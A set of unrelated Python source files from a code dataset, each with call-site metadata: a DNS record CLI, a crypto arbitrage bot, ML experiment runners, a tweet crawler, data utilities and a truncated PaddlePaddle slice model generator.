Assignment" ) @click.option( "-f4", "--ipv4-fqdn", "host4", default=None, help="FQDN for IPv4 PTR Target" ) @click.option( "-f6", "--ipv6-fqdn", "host6", default=None, help="FQDN for IPv6 PTR Target" ) def tenant_reverse(**click_input): """Add Tenant Records from CLI""" if not click_input["config_file"]: config_path = Path.cwd().joinpath("deenis.yaml") if not config_path.exists(): raise click.UsageError( click.style( ( f"Config file not specified and not found at {config_path}. 
" "Please specify a config file path." ), fg="red", bold=True, ) ) elif click_input["config_file"]: config_path = Path().resolve(click_input["config_file"]) if not click_input["prefix4"] and not click_input["prefix6"]: raise click.UsageError( click.style("At least one prefix is required", fg="red", bold=True) ) try: responses = Deenis(str(config_path)).TenantReverse( { "crm_id": click_input["crm_id"], "host4": click_input["host4"], "host6": click_input["host6"], "prefix4": click_input["prefix4"], "prefix6": click_input["prefix6"], } ) """ Response format: [ ( 'Success', 'A', 'test011.omnificent.io', '199.34.95.250', [] ), ( 'Success', 'PTR', '250', 'test011.omnificent.io', [] ) ] """ nl = "\n" tab = " " _text = {"fg": "white", "bold": True} _stat_suc = {"fg": "green", "bold": True} _stat_fail = {"fg": "red", "bold": True} _rec_type = {"fg": "yellow", "bold": True} _rec_name = {"fg": "magenta", "bold": True} _rec_trgt = {"fg": "cyan", "bold": True} _error = {"fg": "red"} click.secho(nl + "Records:" + nl, **_text) for res in responses: status, rec_type, rec_name, rec_trgt, errors = res if status == "Success": _status = ("⚡ " + status, _stat_suc) elif status == "Failure": _status = ("☝ " + status, _stat_fail) click.echo( tab + click.style(_status[0], **_status[1]) + nl + tab * 4 + click.style(rec_type, **_rec_type) + click.style(" ⟫ ", **_text) + click.style(rec_name, **_rec_name) + click.style(" ⟩ ", **_text) + click.style(rec_trgt, **_rec_trgt) ) if errors: click.echo(tab * 4 + click.style("Errors: ", **_stat_fail)) for err in errors: if isinstance(err, dict): for ename in err.keys(): click.echo( tab * 6 + click.style(str(ename) + ":", **_error) + tab + click.style(str(err[ename]), **_error) ) elif isinstance(err, str): click.echo(tab * 4 + click.style(err, **_error)) except (AttributeError, RuntimeError) as tenant_error: raise click.ClickException(tenant_error) if __name__ == "__main__": add_records()
[((19, 1, 25, 1), 'click.group', 'click.group', (), '', False, 'import click\n'), ((34, 1, 34, 84), 'click.option', 'click.option', (), '', False, 'import click\n'), ((35, 1, 35, 80), 'click.option', 'click.option', (), '', False, 'import click\n'), ((36, 1, 36, 80), 'click.option', 'click.option', (), '', False, 'import click\n'), ((37, 1, 37, 65), 'click.option', 'click.option', (), '', False, 'import click\n'), ((98, 1, 98, 84), 'click.option', 'click.option', (), '', False, 'import click\n'), ((99, 1, 101, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((102, 1, 104, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((105, 1, 107, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((108, 1, 110, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((111, 1, 113, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((173, 8, 173, 50), 'click.secho', 'click.secho', ({(173, 20, 173, 40): "(nl + 'Records:' + nl)"}, {}), "(nl + 'Records:' + nl, **_text)", False, 'import click\n'), ((13, 14, 13, 28), 'pathlib.Path', 'Path', ({(13, 19, 13, 27): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((57, 12, 57, 83), 'click.style', 'click.style', (), '', False, 'import click\n'), ((92, 12, 92, 75), 'click.secho', 'click.secho', (), '', False, 'import click\n'), ((133, 12, 133, 79), 'click.style', 'click.style', (), '', False, 'import click\n'), ((205, 14, 205, 48), 'click.ClickException', 'click.ClickException', ({(205, 35, 205, 47): 'tenant_error'}, {}), '(tenant_error)', False, 'import click\n'), ((41, 22, 41, 32), 'pathlib.Path.cwd', 'Path.cwd', ({}, {}), '()', False, 'from pathlib import Path\n'), ((44, 16, 51, 17), 'click.style', 'click.style', (), '', False, 'import click\n'), ((117, 22, 117, 32), 'pathlib.Path.cwd', 'Path.cwd', ({}, {}), '()', False, 'from pathlib import Path\n'), ((120, 16, 127, 17), 'click.style', 'click.style', (), '', False, 'import click\n'), ((54, 22, 54, 28), 'pathlib.Path', 'Path', ({}, {}), '()', False, 'from pathlib import Path\n'), ((130, 22, 130, 28), 'pathlib.Path', 'Path', ({}, {}), '()', False, 'from pathlib import Path\n'), ((189, 18, 189, 52), 'click.style', 'click.style', ({(189, 30, 189, 38): 'rec_trgt'}, {}), '(rec_trgt, **_rec_trgt)', False, 'import click\n'), ((188, 18, 188, 47), 'click.style', 'click.style', ({(188, 30, 188, 37): '""" ⟩ """'}, {}), "(' ⟩ ', **_text)", False, 'import click\n'), ((192, 37, 192, 74), 'click.style', 'click.style', ({(192, 49, 192, 59): '"""Errors: """'}, {}), "('Errors: ', **_stat_fail)", False, 'import click\n'), ((77, 26, 77, 67), 'click.style', 'click.style', (), '', False, 'import click\n'), ((90, 24, 90, 50), 'click.secho', 'click.secho', (), '', False, 'import click\n'), ((187, 18, 187, 52), 'click.style', 'click.style', ({(187, 30, 187, 38): 'rec_name'}, {}), '(rec_name, **_rec_name)', False, 'import click\n'), ((186, 18, 186, 47), 'click.style', 'click.style', ({(186, 30, 186, 37): '""" ⟫ """'}, {}), "(' ⟫ ', **_text)", False, 'import click\n'), ((75, 26, 75, 69), 'click.style', 'click.style', (), '', False, 'import click\n'), ((86, 26, 86, 66), 'click.style', 'click.style', (), '', False, 'import click\n'), ((185, 18, 185, 52), 'click.style', 'click.style', ({(185, 30, 185, 38): 'rec_type'}, {}), '(rec_type, **_rec_type)', False, 'import click\n'), ((203, 45, 203, 71), 'click.style', 'click.style', ({(203, 57, 203, 60): 'err'}, {}), '(err, **_error)', False, 'import click\n'), ((73, 26, 73, 75), 
'click.style', 'click.style', (), '', False, 'import click\n'), ((84, 26, 84, 67), 'click.style', 'click.style', (), '', False, 'import click\n'), ((182, 18, 182, 55), 'click.style', 'click.style', ({(182, 30, 182, 40): '_status[0]'}, {}), '(_status[0], **_status[1])', False, 'import click\n'), ((82, 26, 82, 77), 'click.style', 'click.style', (), '', False, 'import click\n')]
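The click group above can be exercised without a real shell via click's test runner; a hedged sketch (the option flags come from the decorators above, the hostname and addresses are made up, and a valid deenis.yaml is assumed to exist):

from click.testing import CliRunner

runner = CliRunner()
result = runner.invoke(
    add_records,
    ["host", "-c", "deenis.yaml", "-f", "host.example.com",
     "-4", "192.0.2.10", "-6", "2001:db8::10"],
)
print(result.output)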
spiolynn/pybo
main_cl.py
186495de315eb8ec47a996de959574f9864da7c4
# coding: utf-8 from bigone import BigOneDog from common import gen_logger import logging import time import json def strategy_eth_big_bnc_eth(dog): """ 正向:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC 反向:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH :param dog: implemention of BigOneDog :return: 正向收益率,反向收益率 """ big_eth_data = dog.get_order_book('BIG-ETH') big_bnc_data = dog.get_order_book('BIG-BNC') eth_bnc_data = dog.get_order_book('ETH-BNC') print('BIG-ETH') print('卖一', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount']) print('买一', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount']) print('BIG-BNC') print('卖一', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount']) print('买一', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount']) print('ETH-BNC') print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount']) print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount']) # positive transaction pos_anc = 0.999*0.999*0.999*\ ((1 / (float(big_eth_data['asks'][0]['price']))) * float(big_bnc_data['bids'][0]['price']) ) pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1 # negative transaction neg_anc = 0.999 * 0.999 * 0.999 * \ (float(eth_bnc_data['bids'][0]['price']) / float(big_bnc_data['asks'][0]['price']) * float(big_eth_data['asks'][0]['price'])) neg_anc = neg_anc / 1 - 1 flag = False amt = 2.0 if float(big_eth_data['asks'][0]['amount']) >= amt: if float(big_bnc_data['bids'][0]['amount']) >= amt: if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']): flag = True msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:" if pos_anc < 0.01: result = "利润空间小于1%, 放弃本次套利 0" logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) else: result = "利润空间大于1%" if flag is False: result = "{},{}".format(result,"量不足, 放弃本次套利 0") logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) else: result = "{},{}".format(result,"执行本次套利 1") logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result)) print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt))) print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt))) print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'], str(amt * float(big_eth_data['asks'][0]['price'])))) # dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0') # dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0') # dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'], # str(2.0 * float(big_eth_data['asks'][0]['price']))) return True if neg_anc < 0.01: result = "利润空间小于1%, 放弃本次套利 0" else: result = "利润空间大于1%, 执行本次套利 1" logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result)) return False # return pos_anc, neg_anc def strategy_eth_bnc(dog): eth_bnc_data = dog.get_order_book('ETH-BNC') print('ETH-BNC') print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount']) print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount']) anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1 print(anc) if anc > 0.02: r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' ) bid_order_id = r['order_id'] r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' ) ask_order_id = r['order_id'] return anc, anc if __name__ == '__main__': 
gen_logger('bigonetest') logger = logging.getLogger("bigone") with open("PRIVATE_KEY.json",'r') as f: private_key = json.load(f)["key"] dog = BigOneDog(private_key) # strategy_eth_bnc(dog) # dog.get_orders("ETH-BNC",'10') # r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d") # print(r) # r = dog.get_orders('ETH-BNC','10') # print(r) while True: flag = strategy_eth_big_bnc_eth(dog) if flag is True: break else: print("休眠10秒") print("") time.sleep(10) # break # pos_anc, neg_anc = strategy_eth_bnc(dog) # if pos_anc < 0.01: # result = "利润空间小于1%, 放弃本次套利 0" # else: # result = "利润空间大于1%, 执行本次套利 1" # # logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result)) # # if neg_anc < 0.01: # result = "利润空间小于1%, 放弃本次套利 0" # else: # result = "利润空间大于1%, 执行本次套利 1" # # logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result)) # # print("休眠10秒") # print("") # time.sleep(10)
[((108, 4, 108, 28), 'common.gen_logger', 'gen_logger', ({(108, 15, 108, 27): '"""bigonetest"""'}, {}), "('bigonetest')", False, 'from common import gen_logger\n'), ((109, 13, 109, 40), 'logging.getLogger', 'logging.getLogger', ({(109, 31, 109, 39): '"""bigone"""'}, {}), "('bigone')", False, 'import logging\n'), ((113, 10, 113, 32), 'bigone.BigOneDog', 'BigOneDog', ({(113, 20, 113, 31): 'private_key'}, {}), '(private_key)', False, 'from bigone import BigOneDog\n'), ((112, 22, 112, 34), 'json.load', 'json.load', ({(112, 32, 112, 33): 'f'}, {}), '(f)', False, 'import json\n'), ((129, 12, 129, 26), 'time.sleep', 'time.sleep', ({(129, 23, 129, 25): '(10)'}, {}), '(10)', False, 'import time\n')]
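pos_anc and neg_anc above are the round-trip returns of the two triangular cycles, with 0.999 applied once per leg for the 0.1% fee. A worked example of the positive cycle with made-up prices:

fee = 0.999                  # 0.1% fee per leg, three legs
big_eth_ask = 0.00021        # buy BIG with ETH
big_bnc_bid = 0.0125         # sell BIG for BNC
eth_bnc_ask = 58.0           # buy ETH back with BNC
pos_anc = fee ** 3 * (1.0 / big_eth_ask) * big_bnc_bid / eth_bnc_ask - 1
print("expected return: {:.2%}".format(pos_anc))  # must exceed 1% to trigger a trade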
gahaalt/cifar-vs-tensorflow2
run_experiments.py
547d131382438ef76e315dde06a6870737f1fbad
import os
import yaml
import logging
import importlib

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
logging.getLogger('tensorflow').disabled = True

from cifar_training_tools import cifar_training, cifar_error_test


def print_dict(d, tabs=0):
    tab = '\t'
    for key in d:
        if type(d[key]) == dict:
            print(f"{tab*tabs}{key}:")
            print_dict(d[key], tabs+1)
        else:
            print(f"{tab*tabs}{key}: {d[key]}")


print('\n' + '#' * 19)
print("TESTING FOR ERRORS!")
print('#' * 19)

stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
    if 'skip_error_test' in exp and exp['skip_error_test']:
        continue

    model = getattr(importlib.import_module(exp['module']), exp['model'])
    cifar_error_test(model(**exp['model_parameters']))
print("OK!")

print('\n' + '#' * 22)
print("MODEL TRAINING BEGINS!")
print('#' * 22)

stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
    print(); print_dict(exp); print();
    model = getattr(importlib.import_module(exp['module']), exp['model'])
    cifar_training(model(**exp['model_parameters']), **exp['train_parameters'])
[((25, 11, 25, 37), 'yaml.safe_load_all', 'yaml.safe_load_all', ({(25, 30, 25, 36): 'stream'}, {}), '(stream)', False, 'import yaml\n'), ((39, 11, 39, 37), 'yaml.safe_load_all', 'yaml.safe_load_all', ({(39, 30, 39, 36): 'stream'}, {}), '(stream)', False, 'import yaml\n'), ((6, 0, 6, 31), 'logging.getLogger', 'logging.getLogger', ({(6, 18, 6, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'import logging\n'), ((29, 20, 29, 58), 'importlib.import_module', 'importlib.import_module', ({(29, 44, 29, 57): "exp['module']"}, {}), "(exp['module'])", False, 'import importlib\n'), ((42, 20, 42, 58), 'importlib.import_module', 'importlib.import_module', ({(42, 44, 42, 57): "exp['module']"}, {}), "(exp['module'])", False, 'import importlib\n')]
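The loops above expect experiments.yaml to be a stream of YAML documents, each carrying module, model, model_parameters and train_parameters (plus an optional skip_error_test). A hypothetical document, shown here as the dict that yaml.safe_load_all() would yield for it — the module path, class name and parameter values below are assumptions, not part of the repository:

exp = {
    "module": "models.resnet",                   # import path passed to importlib
    "model": "ResNet20",                         # class name looked up with getattr
    "model_parameters": {"l2_reg": 1e-4},
    "train_parameters": {"epochs": 200, "batch_size": 128},
    "skip_error_test": False,
}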
cristicalin/tools
json2yaml.py
b8fe4efb1143a575d102d3a8e368052a4ecdceae
#!/usr/bin/python

import sys
import yaml
import json

if __name__ == '__main__':
    content = json.load(sys.stdin)
    print(yaml.dump(content, indent=2, default_flow_style=False))
[]
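The script converts JSON on stdin to YAML on stdout; the same transformation can be checked in-process with a quick round trip (the sample data is made up):

import yaml

doc = {"name": "demo", "ports": [80, 443]}
text = yaml.dump(doc, indent=2, default_flow_style=False)
assert yaml.safe_load(text) == doc   # the YAML output parses back to the same data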
UpSea/midProjects
histdata/mt5db/script_DownloadAndStoreToMongodb.py
ed6086e74f68b1b89f725abe0b270e67cf8993a8
# -*- coding: utf-8 -*-
import os, sys
from PyQt4 import QtGui, QtCore

dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, 'histdata'))
sys.path.append(dataRoot)

import dataCenter as dataCenter
from data.mongodb.DataSourceMongodb import Mongodb
import datetime as dt


def getSymbols():
    #mid 1) symbol codes copy-pasted from Excel
    codesStr = """
    XAGUSD
    """
    #mid 2) split() turns the string into a list, dropping '\n' and all whitespace by default
    #codeList = ['000021.SZ','000022.SZ']
    codeList = [code.split('.')[0] for code in codesStr.split()]
    return codeList


def subMain():
    DC = dataCenter.dataCenter()
    remoteDataSourceType = 'mt5'
    localStorageType = 'mongodb'
    periodType = 'D'
    timeStart = dt.datetime(2000, 10, 20)
    timeEnd = dt.datetime.now()

    # 1) get codes from eastmoney
    codeList = getSymbols()
    # 2) download history data
    dataDict = DC.downloadHistData(providerType=remoteDataSourceType, storageType=localStorageType, periodType=periodType,
                                   codeList=codeList, timeFrom=timeStart, timeTo=timeEnd)

if __name__ == '__main__':
    #app = QtGui.QApplication(sys.argv)
    #mid-----------------------------------------------------------------------------------------------------------------------------
    subMain()
    #mid-----------------------------------------------------------------------------------------------------------------------------
    #sys.exit(app.exec_())
[((6, 0, 6, 25), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 24): 'dataRoot'}, {}), '(dataRoot)', False, 'import os, sys\n'), ((20, 9, 20, 32), 'dataCenter.dataCenter', 'dataCenter.dataCenter', ({}, {}), '()', True, 'import dataCenter as dataCenter\n'), ((25, 16, 25, 39), 'datetime.datetime', 'dt.datetime', ({(25, 28, 25, 32): '2000', (25, 33, 25, 35): '10', (25, 36, 25, 38): '20'}, {}), '(2000, 10, 20)', True, 'import datetime as dt\n'), ((26, 14, 26, 31), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n'), ((5, 40, 5, 65), 'os.path.dirname', 'os.path.dirname', ({(5, 56, 5, 64): '__file__'}, {}), '(__file__)', False, 'import os, sys\n')]
ermshaua/daproli
daproli/transformer.py
c1f7aeec431d9c60ae06eeac23455c1a03bc82cf
from joblib import Parallel, delayed from tqdm import tqdm from .processing import map, filter, split, expand, combine, join from .manipulation import windowed, flatten class BaseTransformer: ''' The BaseTransformer defines a generic data transformation pattern that can be implemented with a number of data processing concepts. ''' def transform(self, data, *args, **kwargs): raise NotImplementedError() class Mapper(BaseTransformer): def __init__(self, func, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Mapper is the respective transformer for dp.map. Parameters ----------- :param func: the mapping function :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return map(self.func, data, self.ret_type, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Filter(BaseTransformer): def __init__(self, pred, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Filter is the respective transformer for dp.filter. Parameters ----------- :param pred: the filter predicate :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.pred = pred self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return filter(self.pred, data, ret_type=self.ret_type, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Splitter(BaseTransformer): def __init__(self, func, ret_type=None, return_labels=False, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Splitter is the respective transformer for dp.split. Parameters ----------- :param func: the discriminator function :param ret_type: if provided the used return type, otherwise ret_type(data) :param return_labels: true if the associated labels should be returned, false otherwise :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.return_labels = return_labels self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return split(self.func, data, ret_type=self.ret_type, return_labels=self.return_labels, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Expander(BaseTransformer): def __init__(self, func, ret_type=None, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Expander is the respective transformer for dp.expand. 
Parameters ----------- :param func: the expansion function :param ret_type: if provided the used return type, otherwise ret_type(data) :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.ret_type = ret_type self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return expand(self.func, data, ret_type=self.ret_type, expand_args=self.expand_args, n_jons=self.n_jobs, verbose=self.verbose, **self.kwargs) class Combiner(BaseTransformer): def __init__(self, func, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Combiner is the respective transformer for dp.combine. Parameters ----------- :param func: the combination function :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return combine(self.func, *data, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Joiner(BaseTransformer): def __init__(self, func, expand_args=True, n_jobs=1, verbose=0, **kwargs): ''' dp.Joiner is the respective transformer for dp.join. Parameters ----------- :param func: the join function :param expand_args: true if args should be expanded, false otherwise :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.func = func self.expand_args = expand_args self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): return join(self.func, *data, expand_args=self.expand_args, n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs) class Manipulator(BaseTransformer): def __init__(self, func, void=False, *args, **kwargs): ''' dp.Manipulator is a transformer to manipulate the entire collection of data items. Parameters ----------- :param func: the manipulation function :param void: if true the result is not returned :param args: additional args for func :param kwargs: additional kwargs for func ''' self.func = func self.void = void self.args = args self.kwargs = kwargs def transform(self, data, *args, **kwargs): res = self.func(data, *self.args, **self.kwargs) return res if self.void is False else data class Window(BaseTransformer): def __init__(self, size, step=1, ret_type=None): ''' dp.Window is the respective transformer for dp.windowed. Parameters ----------- :param data: an iterable collection of data :param size: the window size :param step: the window step :param ret_type: if provided the used return type, otherwise ret_type(data) ''' self.size = size self.step = step self.ret_type = ret_type def transform(self, data, *args, **kwargs): return windowed(data, self.size, step=self.step, ret_type=self.ret_type) class Flat(BaseTransformer): def __init__(self, ret_type=None): ''' dp.Flat is the respective transformer for dp.flatten. 
Parameters ----------- :param ret_type: if provided the used return type, otherwise ret_type(data) ''' self.ret_type = ret_type def transform(self, data, *args, **kwargs): return flatten(data, ret_type=self.ret_type) class Union(BaseTransformer): def __init__(self, *transformers, n_jobs=1, verbose=0, **kwargs): ''' dp.Union is a construct to manipulate mutli-collections of data tiems. Parameters ----------- :param transformers: the transformers for the respective collections of data items :param n_jobs: amount of used threads/processes :param verbose: verbosity level for tqdm / joblib :param kwargs: additional arguments for joblib.Parallel, e.g. backend='loky' ''' self.transformers = transformers self.n_jobs = n_jobs self.verbose = verbose self.kwargs = kwargs def transform(self, data, *args, **kwargs): if self.n_jobs == 1: return [transformer.transform(items, *args, **kwargs) for transformer, items in tqdm(zip(self.transformers, data), disable=self.verbose < 1)] return Parallel(n_jobs=self.n_jobs, verbose=self.verbose, **self.kwargs)(delayed(transformer.transform) (items, *args, **kwargs) for transformer, items in zip(self.transformers, data)) class Pipeline(BaseTransformer): def __init__(self, *transformers, verbose=0): ''' dp.Pipeline is a construct to pipe a collection of transformers. Parameters ----------- :param transformers: the transformer sequence to apply :param verbose: verbosity level for tqdm ''' self.transformers = list(transformers) self.verbose = verbose def transform(self, data, *args, **kwargs): res = data for transformer in tqdm(self.transformers, disable=self.verbose < 1): res = transformer.transform(res, *args, **kwargs) return res
[((279, 27, 279, 76), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((258, 15, 258, 80), 'joblib.Parallel', 'Parallel', (), '', False, 'from joblib import Parallel, delayed\n'), ((258, 81, 258, 111), 'joblib.delayed', 'delayed', ({(258, 89, 258, 110): 'transformer.transform'}, {}), '(transformer.transform)', False, 'from joblib import Parallel, delayed\n')]
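A usage sketch for the transformers above, assuming the package layout implied by the file path (daproli/transformer.py) and that Filter and Mapper accept plain scalars when expand_args is left at its default:

from daproli.transformer import Filter, Mapper, Pipeline

pipeline = Pipeline(
    Filter(lambda n: n % 2 == 0),   # keep even numbers
    Mapper(lambda n: n * n),        # square them
)
print(pipeline.transform(range(10)))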
LorranSutter/URI-Online-Judge
Ad-Hoc/2454.py
aef885b9a7caa83484cf172e29eea8ec92fc3627
P, R = input().split()

if P == '0':
    print('C')
elif R == '0':
    print('B')
else:
    print('A')
[]
brunotoshio/castella
main.py
ad418bd1beb4953687a4ad7be586b12631c25992
import pymongo import yaml import sched import time import json from castella import TweetCrawler class Castella(object): def __init__(self): # Get connection parameters with open("settings.yml", "r") as stream: try: settings = yaml.safe_load(stream)["settings"] # Database self.server_url = settings["output"]["database"]["url"] self.server_port = settings["output"]["database"]["port"] self.database_name = settings["output"]["database"]["database"] self.collection_name = settings["output"]["database"]["collection"] # Search self.query = settings["search"]["query"] self.search_params = settings["search"]["params"] # Schedule self.interval_type = settings["interval"]["each"] self.interval_amount = settings["interval"]["amount"] self.total_executions = 0 except yaml.YAMLError as exc: print("ERROR: No settings.yml found or it could not be read") def execute_search(self): # Mongo connection client = pymongo.MongoClient(self.server_url, self.server_port) db = client[self.database_name] self.tweets = db[self.collection_name] self._create_scheduled_executions() def _save_tweet(self, tweet): print("Saving: ", tweet._json["id_str"]) try: bson = tweet._json bson["query_str"] = self.query self.tweets.insert_one(bson) except: print("Error occurred when trying to save") def _search(self): # Continue from last id try: self.tweets.create_index([("id", pymongo.DESCENDING)]) last_tweet = self.tweets.find({}).sort([("id", pymongo.DESCENDING)]).next() except StopIteration: last_tweet = None # Searching tc = TweetCrawler() params = dict(result_type="recent", include_entities=True, count=100) if isinstance(self.search_params, dict): params.update(self.search_params) if last_tweet is not None: print("============================================================") print("Resuming from tweet id:", last_tweet['id_str']) print("============================================================") params["since_id"] = last_tweet.get("id_str") tc.search(self.query, self._save_tweet, params) self.total_executions += 1 print("============================================================") print("Finished for today...") print(self.total_executions, "out of", self.interval_amount, "scheduled executions") print("============================================================") if self.total_executions < self.interval_amount: print("Keep this process running until the execution of the last scheduled iteration, or stop this process to cancel further executions.") print("============================================================") # Preparing functions for scheduler def _days(self): return time.time() / (60 * 60 * 24) def _weeks(self): return time.time() / (60 * 60 * 24 * 7) # Scheduling events def _create_scheduled_executions(self): if self.interval_type == "day": handler = self._days else: handler = self._weeks scheduler = sched.scheduler(handler, time.sleep) for i in range(self.interval_amount): scheduler.enter(i, 1, self._search) scheduler.run() if __name__ == "__main__": searcher = Castella() searcher.execute_search()
[((35, 17, 35, 71), 'pymongo.MongoClient', 'pymongo.MongoClient', ({(35, 37, 35, 52): 'self.server_url', (35, 54, 35, 70): 'self.server_port'}, {}), '(self.server_url, self.server_port)', False, 'import pymongo\n'), ((59, 13, 59, 27), 'castella.TweetCrawler', 'TweetCrawler', ({}, {}), '()', False, 'from castella import TweetCrawler\n'), ((95, 20, 95, 56), 'sched.scheduler', 'sched.scheduler', ({(95, 36, 95, 43): 'handler', (95, 45, 95, 55): 'time.sleep'}, {}), '(handler, time.sleep)', False, 'import sched\n'), ((83, 15, 83, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((87, 15, 87, 26), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((14, 27, 14, 49), 'yaml.safe_load', 'yaml.safe_load', ({(14, 42, 14, 48): 'stream'}, {}), '(stream)', False, 'import yaml\n')]
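__init__ above expects a settings.yml with output, search and interval sections; a hypothetical file, shown as the dict that yaml.safe_load() would return (all values are made up):

settings = {
    "settings": {
        "output": {"database": {"url": "localhost", "port": 27017,
                                "database": "castella", "collection": "tweets"}},
        "search": {"query": "#python", "params": {"lang": "en"}},
        "interval": {"each": "day", "amount": 7},
    }
}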
monroid/openvino
ngraph/test/frontend/paddlepaddle/test_models/gen_scripts/generate_slice.py
8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6
#
# slice paddle model generator
#
import numpy as np
from save_model import saveModel
import paddle as pdpd
import sys

data_type = 'float32'

def slice(name : str, x, axes : list, start : list, end : list):
    pdpd.enable_static()

    with pdpd.static.program_guard(pdpd.static.Program(), pdpd.static.Program()):
        node_x = pdpd.static.data(name='x', shape=x.shape, dtype = data_type)
        out = pdpd.fluid.layers.slice(node_x, axes = axes, starts = start, ends = end)

        cpu = pdpd.static.cpu_places(1)
        exe = pdpd.static.Executor(cpu[0])
        # startup program will call initializer to initialize the parameters.
        exe.run(pdpd.static.default_startup_program())

        outs = exe.run(
            feed={'x': x},
            fetch_list=[out])

